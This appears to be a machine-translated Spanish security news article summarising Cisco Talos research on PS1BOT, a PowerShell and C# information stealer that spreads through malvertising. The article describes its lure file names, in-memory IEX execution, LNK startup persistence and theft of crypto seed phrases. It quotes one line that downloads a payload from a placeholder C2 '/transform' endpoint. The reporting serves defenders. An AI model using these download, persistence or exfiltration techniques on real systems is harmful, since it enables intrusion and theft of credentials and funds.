Ha surgido una nueva y sofisticada campaña de malware dirigida a Windows Systems, empleando un marco de varias etapas denominado “PS1BOT” que combina componentes PowerShell y C# para realizar operaciones de robo de información extensas.
El malware representa una evolución significativa en las metodologías de ataque, utilizando la arquitectura modular y las técnicas de ejecución en memoria para evadir los mecanismos de detección tradicionales mientras mantiene el acceso persistente a sistemas comprometidos.
PS1BOT opera a través de campañas de malvertimiento que entregan archivos comprimidos con nombres de archivo diseñados para que coincidan con los patrones de optimización de motores de búsqueda, como el “Capítulo 8 Medicare Benefit Policy Manual.zip” y “Contando hojas de trabajo de dinero canadiense pdf.zip.e49”.
Estos archivos aparentemente legítimos contienen un descargador de JavaScript llamado “Document.js completo” que inicia la cadena de infecciones al recuperar componentes maliciosos adicionales de los servidores controlados por el atacante.
El diseño modular del malware permite a los actores de amenaza implementar varios componentes especializados a pedido, incluidos robos de información, keyloggers, herramientas de captura de pantalla y mecanismos de persistencia.
Analistas de Cisco Talos anotado que PS1BOT ha sido extremadamente activo durante 2025, con nuevas muestras observadas continuamente, lo que indica un desarrollo continuo y el refinamiento del marco.
Deobfuscando el script de descarga (fuente – Cisco Talos)
Lo que distingue a PS1BOT del malware convencional es su énfasis en el sigilo a través de la mínima huella de disco y el uso extenso de la ejecución en memoria.
El marco aprovecha la funcionalidad de Invoke-Expression (IEX) de PowerShell para ejecutar dinámicamente módulos sin escribirlos en el disco, reduciendo significativamente la probabilidad de detección por las soluciones antivirus tradicionales.
Mecanismos sofisticados de persistencia y evasión
PS1BOT implementa una estrategia de persistencia particularmente inteligente que crea scripts de PowerShell con nombre aleatorio dentro del directorio % ProgramData % junto con los archivos de acceso directo correspondientes.
El malware genera un archivo LNK malicioso en el directorio de inicio de Windows que apunta a estos scripts de PowerShell, asegurando la reactivación después de reiniciar el sistema.
El módulo de persistencia recupera las cargas útiles ofuscadas del punto final “/transformación” del servidor de comando, como se demuestra en la siguiente estructura del código:–
$ url = “http: // (c2_server)/transform” $ content = (new-object net.webclient) .downloadString ($ url) # El contenido se desobfusca y se escribe en el archivo PS1 de nombres aleatorios
Esta carga útil contiene la misma lógica de votación C2 utilizada en la infección inicial, creando un ciclo de autoperpetuación.
El malware construye URL de comunicación únicas que utilizan el número de serie C: impulsor del sistema infectado, lo que permite el seguimiento individualizado de máquinas comprometidas mientras mantiene la seguridad operativa.
Las capacidades de robo de información del marco son particularmente preocupantes, apuntando a billeteras de criptomonedas a través de listas de palabras integradas que contienen combinaciones de frases de semillas en múltiples idiomas.
Ejemplo de publicación HTTP que contiene un archivo de imagen de captura de pantalla codificado Base64 (fuente – Cisco Talos)
PS1BOT escanea el sistema de archivos para documentos que contienen frases de recuperación de billetera y archivos de contraseña, comprimiendo y exfiltrando estos datos confidenciales a través de solicitudes de publicación HTTP a la infraestructura del atacante.
Los investigadores de Cisco Talos identificaron similitudes significativas en el código entre PS1BOT y las familias de malware previamente informadas, incluidos los BOT AHK y los componentes asociados con las campañas de sketchnet, lo que sugiere posibles recursos de desarrollo compartido o colaboración de actores de amenazas en estas operaciones.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
